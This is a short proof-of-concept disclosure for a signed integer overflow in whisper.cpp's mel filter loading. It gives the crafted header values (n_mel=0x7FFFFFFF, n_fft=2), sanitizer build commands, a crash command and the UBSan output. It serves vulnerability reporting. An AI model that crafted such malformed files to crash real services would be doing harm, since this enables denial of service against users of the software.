# PoC: Signed Integer Overflow in whisper.cpp Mel Filter Loading

**Format:** GGML (.bin)
**Target:** whisper.cpp (ggml-org/whisper.cpp)
**CWE:** CWE-190 (Integer Overflow)

## Vulnerability

Signed integer overflow in mel filter size calculation. `n_mel=0x7FFFFFFF * n_fft=2` overflows int32 → massive `vector::resize()` → crash.

## Reproduction

```bash
git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
mkdir build-asan && cd build-asan
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
make -j$(nproc)
./bin/whisper-cli -m ../poc_mel_overflow.bin -f /dev/null
```

UBSan reports: `runtime error: signed integer overflow: 2147483647 * 2`

**Tested:** whisper.cpp commit 364c77f4